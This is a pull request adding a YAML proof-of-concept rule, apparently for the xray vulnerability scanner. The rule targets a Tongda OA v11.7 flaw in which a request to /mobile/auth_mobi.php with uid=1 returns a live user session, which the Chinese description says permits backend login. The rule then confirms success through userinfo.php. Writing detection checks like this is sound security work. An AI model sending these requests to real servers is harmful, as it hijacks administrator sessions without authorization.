### PR TITLE
tongda-user-session-disclosure

### DIFF
--- a/pocs/tongda-user-session-disclosure.yml
+++ b/pocs/tongda-user-session-disclosure.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-tongda-user-session-disclosure
+rules:
+  - method: GET
+    path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
+    follow_redirects: false
+    expression: true
+
+  - method: POST
+    path: /general/userinfo.php?UID=1
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
+
+detail:
+  author: kzaopa(https://github.com/kzaopa)
+  links:
+    - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ

--- a/pocs/tongda-user-session-disclosure.yml
+++ b/pocs/tongda-user-session-disclosure.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
     follow_redirects: false
-    expression: true
+    expression: "true"
 
   - method: POST
     path: /general/userinfo.php?UID=1


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
通达OA v11.7 中存在某接口查询在线用户，当用户在线时会返回 PHPSESSION使其可登录后台系统

## 测试环境
app="TDXK-通达OA"

## 备注
之前提交过一次 https://github.com/chaitin/xray/pull/1145 这次完善了下规则，如果没有跑到案例麻烦多跑一些url或者联系我提供也可以

![](https://i.postimg.cc/RF6Cm1TF/11111.jpg)
